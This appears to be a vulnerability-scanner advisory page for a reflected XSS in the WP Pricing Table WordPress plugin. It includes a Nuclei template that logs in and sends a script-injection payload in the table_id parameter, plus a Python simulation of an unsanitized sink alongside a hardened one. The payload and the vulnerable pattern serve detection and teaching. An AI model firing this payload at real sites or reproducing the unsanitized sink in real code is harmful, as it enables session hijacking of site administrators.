
WP Pricing Table - Reflected XSS

CVE-2024-13628
Verified

Description

The WP Pricing Table WordPress plugin, in versions up to and including 1.1, contains a reflected cross-site scripting vulnerability: a request parameter is echoed into an admin page without sanitization. An attacker who crafts a malicious URL and gets a high-privilege user (such as an administrator) to open it can execute script in that user's browser session.

Severity

Medium

CVSS Score

6.1

Exploit Probability

2%

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-13628.yaml
id: CVE-2024-13628

info:
  name: WP Pricing Table - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of WP Pricing Table plugin that addresses the vulnerability or apply security patches.
  reference:
    - https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13628
    cwe-id: CWE-79
    epss-score: 0.01826
    epss-percentile: 0.83124
    cpe: cpe:2.3:a:codecabin:wp_pricing_table:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/wp-pricing-table/"
  tags: cve,cve2024,codecabin,wp-pricing-table,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp-pricing-table-menu&action=new&table_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","wp-pricing-table")
        condition: and
# digest: 490a004630440220392388572c4e8b75e6cd9f2e511ddbe74219bd4776f30a2fb7c5a5e6749cfea002201960d10a8d416bf0f6eb3aa235349b6b4ef7b74b6afb42a82941ddaf5cbb5108:922c64590222798bb761d5b6d8e72950
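Two things about the template above are easy to miss: the payload's trailing `<script>` exists to swallow the rest of the original inline script so the page still parses, and the `flow: http(1) && http(2)` line means the template only reports a hit when it has a valid WordPress session (the `PR:N` in the vector refers to the attacker; the victim who opens the link must be logged in, hence `UI:R`). The following Python script, added here as an illustration and not taken from the template or from the plugin, models that behaviour offline: a hypothetical unsanitized sink beside a hardened one, and the template's own matcher condition run against both. The plugin's source is not shown on this page, so the two `render_*` functions are stand-in shapes chosen to match the "unsanitized parameter output" the advisory describes; the parameter name `table_id`, the payload and the marker strings are copied from the template.

```python
"""
Added example (not part of the Nuclei template or the WP Pricing Table
plugin): models the reflected-XSS sink the template probes and the
template's matcher logic, so the vulnerable/patched difference and the
need for a logged-in session are visible without a live target.
"""
import json
from urllib.parse import parse_qs, urlsplit

# Request target exactly as sent by the template's second step.
REQUEST_URL = (
    "/wp-admin/admin.php?page=wp-pricing-table-menu&action=new&table_id="
    '"></script><script>alert(document.domain)</script><script>'
)
# The two strings the template's contains_all matcher requires in the body.
PAYLOAD = '"></script><script>alert(document.domain)</script><script>'
PAGE_MARKER = "wp-pricing-table"


def extract_table_id(url: str) -> str:
    """Return the table_id query value the way a PHP $_GET lookup would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("table_id", [""])[0]


def render_unsanitized(table_id: str) -> str:
    """Hypothetical vulnerable sink (assumed shape, not the plugin's code):
    the raw parameter lands inside an inline script string. The payload's
    leading '">' closes that string, its </script> ends the block, and the
    trailing '<script>' swallows the original '";</script>' so the page
    stays parseable and the injected alert() runs."""
    return (
        '<div class="wp-pricing-table">'
        '<script>var tableId = "' + table_id + '";</script>'
        "</div>"
    )


def render_hardened(table_id: str) -> str:
    """Hypothetical fixed sink: an ID is coerced to a non-negative integer
    (the equivalent of WordPress absint()) and emitted as a JSON literal,
    so no attacker-controlled characters reach the page."""
    safe_id = int(table_id) if table_id.isdigit() else 0
    return (
        '<div class="wp-pricing-table">'
        "<script>var tableId = " + json.dumps(safe_id) + ";</script>"
        "</div>"
    )


def template_matches(status_code: int, body: str) -> bool:
    """Same condition as the template's second matcher: HTTP 200 and both
    strings present (contains_all, condition: and)."""
    return status_code == 200 and PAYLOAD in body and PAGE_MARKER in body


def probe(render, logged_in: bool = True) -> bool:
    """Simulate one run of the template's second step against a sink.
    Without a session, wp-admin answers with a redirect (302) instead of
    the page, which is why the template logs in first and why an
    unauthenticated scan reports nothing."""
    if not logged_in:
        return template_matches(302, "")
    table_id = extract_table_id(REQUEST_URL)
    return template_matches(200, render(table_id))


if __name__ == "__main__":
    print("unsanitized, logged in :", probe(render_unsanitized))
    print("hardened,    logged in :", probe(render_hardened))
    print("unsanitized, no session:", probe(render_unsanitized, logged_in=False))
```

When running the real template, supply `-var username=... -var password=...` for an account that can reach the plugin's admin menu; a run without credentials will never match, which is a false negative rather than evidence the site is patched.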

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2024-13628
CWE ID: CWE-79

References

https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/

Remediation Steps

Update WP Pricing Table to a release that fixes this issue, or apply the vendor's security patch. Until a fixed version is installed, deactivate or remove the plugin so the affected admin page is no longer reachable.